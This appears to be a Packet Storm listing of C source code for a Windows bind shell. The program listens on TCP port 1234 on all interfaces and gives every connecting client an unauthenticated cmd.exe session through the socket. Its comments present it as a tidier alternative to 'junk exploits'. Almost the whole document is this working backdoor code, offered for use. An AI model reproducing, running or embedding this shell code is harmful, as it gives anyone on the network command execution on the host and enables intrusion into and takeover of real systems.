Simple multi-threaded code that spawns a command prompt on win32.
fb905034094e2423d323b670b2e31b316d61f5dadd627838561f0374cf37a54c
// just simple and safe multi-threaded code that spawns command prompt on a win32 system
// you might notice how all the junk exploits don't close handles properly ;)
#include <stdio.h>
#include <windows.h>
#include <winsock2.h>
#pragma comment(lib,"ws2_32.lib")
DWORD WINAPI ThreadProc(LPVOID lpParameter)
{
PROCESS_INFORMATION pi;
STARTUPINFO si;
ZeroMemory(&si,sizeof(si));
ZeroMemory(&pi,sizeof(pi));
si.cb = sizeof(si);
si.hStdError = lpParameter;
si.hStdInput = lpParameter;
si.hStdOutput = lpParameter;
si.dwFlags = STARTF_USESTDHANDLES;
CreateProcess(NULL,"cmd",NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi);
WaitForSingleObject(pi.hProcess,INFINITE);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
closesocket((SOCKET)lpParameter);
ExitThread(0);
}
int main(int argc, char **argv[])
{
WSADATA wsaData;
sockaddr_in service;
SOCKET server,client;
if((WSAStartup(MAKEWORD(2,0),&wsaData)) == 0) {
if((server = WSASocket(AF_INET,SOCK_STREAM,IPPROTO_IP,NULL,0,NULL)) != INVALID_SOCKET) {
service.sin_addr.S_un.S_addr = INADDR_ANY;
service.sin_port = htons(1234);
service.sin_family = AF_INET;
if(!bind(server,(SOCKADDR*)&service,sizeof(service))) {
if(!listen(server,0)) {
while((client = accept(server,0,0)) != SOCKET_ERROR) {
CloseHandle(CreateThread(NULL,NULL,ThreadProc,(LPVOID)client,NULL,NULL));
}
}
}
closesocket(server);
}
WSACleanup();
}
return(0);
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed